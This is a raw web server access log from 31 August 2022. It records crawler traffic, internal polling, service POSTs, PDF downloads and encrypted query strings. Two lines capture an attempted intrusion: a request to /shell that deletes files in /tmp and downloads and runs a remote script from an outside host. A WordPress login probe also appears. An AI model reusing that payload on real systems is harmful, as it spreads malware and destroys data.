66.249.73.127 - - [31/Aug/2022:06:36:12 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:06:34:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
93.158.161.37 - - [31/Aug/2022:06:36:42 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:06:35:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:06:38:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:06:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42480
201.245.192.253 - - [31/Aug/2022:06:40:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42798
201.245.192.253 - - [31/Aug/2022:06:40:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
77.88.5.174 - - [31/Aug/2022:06:41:42 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:06:40:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:41:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
207.46.13.186 - - [31/Aug/2022:06:43:26 -0500] "GET /BLA/resoluciones/AUTOS%202022/0398.pdf HTTP/1.1" 200 377349
216.245.221.92 - - [31/Aug/2022:06:43:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.80 - - [31/Aug/2022:06:44:43 -0500] "GET /BLA/resoluciones/AUTOS%202022/1994.pdf HTTP/1.1" 200 405745
201.245.192.253 - - [31/Aug/2022:06:45:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:06:46:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2022:06:48:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:47:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
77.88.5.25 - - [31/Aug/2022:06:49:42 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:06:50:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.101 - - [31/Aug/2022:06:52:15 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [31/Aug/2022:06:52:16 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [31/Aug/2022:06:53:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:52:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:52:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:06:55:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:06:58:30 -0500] "HEAD / HTTP/1.1" 200 -
41.44.245.245 - - [31/Aug/2022:06:59:15 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
41.44.245.245 - - [31/Aug/2022:06:59:18 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [31/Aug/2022:06:57:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.241 - - [31/Aug/2022:06:59:42 -0500] "-" 408 -
186.102.50.88 - - [31/Aug/2022:07:00:04 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19eGjfckWvRhn+HHbdPPZcmnN0aETPhUerQ+y4x4CgjqgJtcBh0YuJU&y=U2FsdGVkX19WdfoRmUvUtv9eOozF7aLZg7KV/W0Pp8uCujFipAOmeQypmG4SoCDc HTTP/1.1" 200 30
186.102.50.88 - - [31/Aug/2022:07:00:05 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/dnRyT9sSCaOq6ylcdk2BDgwvHttAb+2FJSWrFY5MkGu12UpMhgftt+GGDFqyGrbLGpbUdfkhRbZ9FCrXQUyikKUwM2Dat8lk=&u=U2FsdGVkX1+4OPodUZMhtv3d0X9Ge8H2LeHgRWfT2W0=&y=U2FsdGVkX19WdfoRmUvUtv9eOozF7aLZg7KV/W0Pp8uCujFipAOmeQypmG4SoCDc HTTP/1.1" 200 97
186.102.50.88 - - [31/Aug/2022:07:00:05 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/TgGGTviuf2NQpUiv93KmQz7BiHnNYH4Zt/nkMU9gjufxgQ0UmTGVQ5z9kNNZf/V/CuHLMeBJPKNak7Hex87q3LRShbhSUutW76LZI/6HCd+dMY4O1pn3aPNCqJPNGWAnH89RNExk6nNzU+MDJMh5BW1nBiTbJOJg7jtm5yyCDgW3BFM4jU11AoZCA+wZhj26F3jdBUvCUwy7RPb3W6tNWqAcId5AZuQqHq0RBX7RwBV5/Z6PagMdVc4mstq5QQ+ydx8neVs7XC18IlWe3RA1APmZKAtvyiMK9zymBFTr4bQbmmenSi9H19hJ1+/2AHfLLxeGlXSh2ypa1ix/ZfSWs51quiICd8DLlmpgn05XeU9u4OPqsG00JmsYippVjVHA7HjyVi/ArlBpO7b6yI5qm/pFacZyH0AXAWa7JeexxP8HrE2MFGiRs9DISwH31ZlPfCF/5i9/ZJvbx/Xfzp0b1egAYRWFPzS5k1wJDWh+NIy/3ehPvzewQybMaHmEtC0TxtS6QQtWGisJJ7l3RMJj7ia9xRBSlUtL7iBnkSzi8XwtE9NO3DVakZfUpnSCzUQPi/HXfmkk2CmBSjIwKPQtKVQ9QZpsnqjwzu1Dle4QbVrROp8qAq9e6xo1rIib+LrDJfHwxPNiTJ7kP+JGDnth0mBX16mNTkfG/1W6A1nTqxwfoGVZ2S+9piBul140gWT6eRfwxYtkoezka2NqaKtADlxlJnBxeHrqrD4AwYbh470lzANmvmZgiE+Y/FxIuZzTz15Twq7rIpJw2E5wq/OeWPNA6ka8DM4qpmo7BDUuuoNi7VA5dfkp1JXuawezw61+rd94fcneksfyz8wsqvO1L0nKH2ygKAdjrM1D/Fcpi9zZq5hIFPpmgKZO8KAnuT696PeksgZnx9GRenzXFOLDkUL3AfyuZQY1z0VIe775rSltqXzKPQmagV7Xzx6hXSDueyHd7AR8pTWbkw4L/RdTaCdtye4Daq94Xp5u935RfYdhCD4l8EUGU9Qss0iFFv3/tt3Of7LeyJCipMo62JSO12X//PUG3Lkzy4YXERYpVNLPry0b5GoVN4/2jM+058Ql6ddoBsoK+gTsYivxVXgCib+t9HmqI2GqGPuBnuQW/kDtG8ie8KTEUgAHr/NHCCV0+noShAXnx8ByhlL/v/mWT/NFLByBbBwwT7GqrDlkA3GGg1Sb/x0BqxUfNMz/JZkjQZvnlBZ4wllB2UlMgLTc3fXijcynME+zsWijfekGRZsIMIdF+X4AU4haD99re2VK7duyeUJ7mPWFgqMiYo2/GUUUjmArCQfvFvdZTfiLPz+6vY8uFsoW2HFbqbW7QR5Qxkg5Ggj2J2iGB4tIe/gv4UM4KhSmxF9I=&u=U2FsdGVkX1+4OPodUZMhtv3d0X9Ge8H2LeHgRWfT2W0=&y=U2FsdGVkX19WdfoRmUvUtv9eOozF7aLZg7KV/W0Pp8uCujFipAOmeQypmG4SoCDc HTTP/1.1" 200 383
